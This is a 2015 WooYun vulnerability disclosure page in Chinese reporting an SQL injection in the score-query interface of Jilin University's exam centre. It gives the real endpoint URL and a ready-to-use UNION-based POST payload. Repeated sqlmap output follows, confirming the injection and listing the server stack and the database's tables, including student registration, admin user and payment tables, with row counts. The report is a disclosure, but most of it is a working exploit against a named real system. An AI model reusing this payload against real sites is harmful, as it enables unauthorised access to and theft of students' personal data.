当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128118

漏洞标题:吉林大学考试中心存在SQL注入漏洞

相关厂商:吉林大学考试中心

漏洞作者: 路人甲

提交时间:2015-07-21 17:51

修复时间:2015-07-26 17:52

公开时间:2015-07-26 17:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

吉林大学考试中心成绩查询介面存在SQL注入漏洞

详细说明:

http://kszx.jlu.edu.cn/kscj/chaxun_result.php
(POST)
%E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0=1002' UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL#&%E9%80%89%E6%8B%A9%E6%9D%A1%E4%BB%B6=%E8%BA%AB%E4%BB%BD%E8%AF%81&%E6%9F%A5%E8%AF%A2%E5%8F%B7%E7%A0%81=123&Submit=%E6%9F%A5%E8%AF%A2%E6%88%90%E7%BB%A9

漏洞证明:

2015-7-21 下午 02-23-12.png


-----
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: %E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: %E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0=1002' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7174776e71,0x6f57696f554150614141,0x716c627071),NULL,NULL,NULL#&%E9%80%89%E6%8B%A9%E6%9D%A1%E4%BB%B6=%E8%BA%AB%E4%BB%BD%E8%AF%81&%E6%9F%A5%E8%AF%A2%E5%8F%B7%E7%A0%81=123&Submit=%E6%9F%A5%E8%AF%A2%E6%88%90%E7%BB%A9
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL#
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL 5
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: %E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: %E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0=1002' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7174776e71,0x6f57696f554150614141,0x716c627071),NULL,NULL,NULL#&%E9%80%89%E6%8B%A9%E6%9D%A1%E4%BB%B6=%E8%BA%AB%E4%BB%BD%E8%AF%81&%E6%9F%A5%E8%AF%A2%E5%8F%B7%E7%A0%81=123&Submit=%E6%9F%A5%E8%AF%A2%E6%88%90%E7%BB%A9
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL#
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL 5
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: %E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: %E8%80%83%E8%AF%95%E5%90%8D%E7%A7%B0=1002' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7174776e71,0x6f57696f554150614141,0x716c627071),NULL,NULL,NULL#&%E9%80%89%E6%8B%A9%E6%9D%A1%E4%BB%B6=%E8%BA%AB%E4%BB%BD%E8%AF%81&%E6%9F%A5%E8%AF%A2%E5%8F%B7%E7%A0%81=123&Submit=%E6%9F%A5%E8%AF%A2%E6%88%90%E7%BB%A9
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL#
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL 5
Database: hwkszx
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| `szjk_预报名库` | 64283 |
| kszx_baokao_szjk | 51806 |
| kszx_new_baokao_szjk | 51806 |
| `szjk_考场对照表` | 50933 |
| szjk_cjk | 50933 |
| `学生注册信息` | 38778 |
| `kszx_jiankao_ready备份` | 37673 |
| `学生注册信息201412备份` | 34136 |
| ime_py | 27840 |
| kszx_jiankao_ready | 27636 |
| cet46_cjk | 25042 |
| kszx_jiankao_ready_201505copy | 24416 |
| kszx_zhunkaozheng_1 | 14623 |
| file_key_used_cache | 13447 |
| `kszx_baokao_cet46(201506)` | 12268 |
| kszx_baokao_cet46 | 12268 |
| kszx_chengji | 12089 |
| kszx_zhunkaozheng | 12088 |
| `kszx_baokao_cet46-` | 11716 |
| xueji | 11577 |
| `办公_邮寄信息单2` | 10425 |
| `办公_邮寄信息单copy` | 10368 |
| `kszx_baokao_cet46(201412)` | 10100 |
| kszx_new_chengji | 9910 |
| kszx_chengji_cet | 9903 |
| `办公_邮寄信息单网付表` | 9137 |
| kszx_jiankaobaoming | 6849 |
| `上传成绩库` | 6580 |
| kszx_new_baokao_ncre | 5205 |
| kszx_zhunkaozheng_jlpt | 5055 |
| kszx_jiankaobaoming_beifen | 4927 |
| kszx_baokao_103 | 4722 |
| kszx_baokao_ncre_1403 | 4510 |
| kszx_baokao_ncre_done | 4510 |
| hwkszx_kszx_baokao_cet46 | 4456 |
| `全` | 3961 |
| kszx_count1 | 3531 |
| kszx_chengji_ncre | 3024 |
| kszx_zhunkaozheng_ncre | 3024 |
| kszx_zhunkaozheng_szjk | 2679 |
| kszx_new_yjxxd | 2631 |
| kszx_baokao_ncre | 1831 |
| kszx_chengji_ncre_copy | 1754 |
| kszx_baokao_ncre_1409 | 1677 |
| hwkszx_yeepay | 1302 |
| kszx_baokao_han | 852 |
| kszx_homepage_xinwen | 833 |
| kszx_new_bangong_cet | 804 |
| kszx_baokao_wsk_1411 | 800 |
| icbc_sign | 765 |
| `11年12月网上查询信息` | 753 |
| kszx_baokao_wsk | 711 |
| kszx_jiankao_ready_chongfu | 702 |
| bangong_cet2 | 668 |
| `kszx_baokao_bec2014上` | 663 |
| kszx_baokao_bec_201212 | 614 |
| kszx_new_baokao_bec | 614 |
| kszx_zhunkaozheng_wsk | 611 |
| kszx_baokao_bec | 590 |
| kszx_new_baokao_cet | 574 |
| `kszx_baokao_bec2014年下半年` | 566 |
| kszx_baokao_tem | 562 |
| `kszx_baokao_wexp_报名库` | 506 |
| bangong_cet20120321error | 426 |
| kszx_jiankao_black | 420 |
| kszx_baokao_hsk | 395 |
| kszx_new_baokao_hsk | 395 |
| bangong_cet | 365 |
| wangshangpeixun | 279 |
| kszx_baokao_pet | 274 |
| `kszx_baokao_pet(201506)` | 272 |
| kszx_zhunkaozheng_tem | 266 |
| kszx_zhunkaozheng_pet | 258 |
| kszx_baokao_wexp_201405 | 218 |
| cet_zhuanye2 | 216 |
| kszx_baokao_jtest | 214 |
| kszx_jiankao_done | 199 |
| kszx_jiankao_zhuanye | 186 |
| pets_cjk_ks_2003_03 | 186 |
| kszx_baokao_klt | 177 |
| `kszx_baokao_pet(201412)` | 170 |
| kszx_jiankao_jiaogongdanwei | 161 |
| cet_zhuanye | 154 |
| kszx_baokao_pets_1209 | 136 |
| cet_zhuanye1 | 133 |
| kszx_baokao_pets | 117 |
| `1` | 93 |
| `kszx_baokao_pets2015年上半年` | 90 |
| kszx_new_baokao_pets | 90 |
| `szjk_考点` | 75 |
| tbl_BAOKAO_YASI | 71 |
| kszx_zhunkaozheng_pets | 69 |
| pets_cjk_201009 | 69 |
| pets_cjk_20100911 | 69 |
| pets_cjk_bs_2003_03 | 57 |
| file_key_list | 50 |
| department | 48 |
| kszx_baokao_zhiye_jieshao | 48 |
| kszx_new_department | 48 |
| kszx_new_baokao_wsk_xiaoyuzhong | 44 |
| kszx_new_jiankao_category_ryfl | 44 |
| `szjk_各省计生委` | 41 |
| `kszx_jiankao_category_人员分类` | 38 |
| `szjk_考试地点` | 37 |
| cet_user | 31 |
| cet_user_2 | 30 |
| department_qianwei | 30 |
| `办公_邮寄信息单` | 28 |
| kszx_baokao_wsk_xiaoyuzhong | 28 |
| kszx_baokao_itlc | 27 |
| department1 | 25 |
| kszx_info | 24 |
| kszx_kaoshijieshao2 | 23 |
| kszx_baokao_shengjsj | 22 |
| kszx_info0 | 22 |
| SESSION_ID | 22 |
| kszx_info2 | 21 |
| kszx_new_peixun | 21 |
| kszx_new_ks | 19 |
| kszx_new_zhunkaozheng_kaoshiming | 18 |
| kszx_zhunkaozheng_kaoshiming | 18 |
| kszx_kaoshijieshao | 17 |
| kszx_fufei_kaoshimingcheng_beifen | 16 |
| kszx_baokao_xuan | 15 |
| kszx_jiankao_ready_full | 15 |
| `教务反馈` | 14 |
| bangong_file | 14 |
| tem | 13 |
| kszx_chengji_kaoshiming | 12 |
| kszx_kaoshijieshao0 | 12 |
| kszx_new_kaoshijieshao0 | 12 |
| kszx_switch_baokao | 12 |
| `szjk_新闻` | 10 |
| `wxh-pets-date` | 10 |
| kszx_new_bangong_file | 10 |
| kszx_new_switch_baokao | 10 |
| `办公_邮寄信息单网付表2` | 8 |
| kszx_baokao_pets_train | 8 |
| kszx_jiankao_category | 8 |
| kszx_baokao_cae | 7 |
| kszx_new_baokao_cae | 7 |
| kszx_new_jiankao_category | 7 |
| kszx_new_news | 7 |
| kszx_baokao_ielts | 6 |
| kszx_new_chengji_kaoshiming | 6 |
| kszx_new_xinxi | 6 |
| kszx_switch_zhunkaozheng | 6 |
| yijian | 5 |
| admin_user | 4 |
| kszx_new_info | 4 |
| kszx_new_kaoshijieshao | 4 |
| kszx_zhunkaozheng_topikshiwu | 4 |
| `kszx_jiankao_人员分类` | 3 |
| `宣讲会报名_宣讲会信息` | 3 |
| kszx_new_jiankao_ryfl | 3 |
| `付费帐单` | 2 |
| icbc_config | 1 |
| kszx_baokao_cet46_lock | 1 |
| kszx_baokao_itlc_lock | 1 |
| kszx_baokao_pet_lock | 1 |
| kszx_baokao_wexp_lock | 1 |
| kszx_baokao_wsk_lock | 1 |
| kszx_baokao_wsk_xiaoyuzhong_lock | 1 |
| kszx_count | 1 |
| kszx_homgpage_ip | 1 |
| kszx_jiankao_config | 1 |
| kszx_new_baokao_gdy_train | 1 |
| kszx_new_jiankao_config | 1 |
| kszx_zhunkaozheng_jtest | 1 |
+-----------------------------------+---------+
+-
-----

修复方案:

you know.....

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-26 17:52

厂商回复:

最新状态:

暂无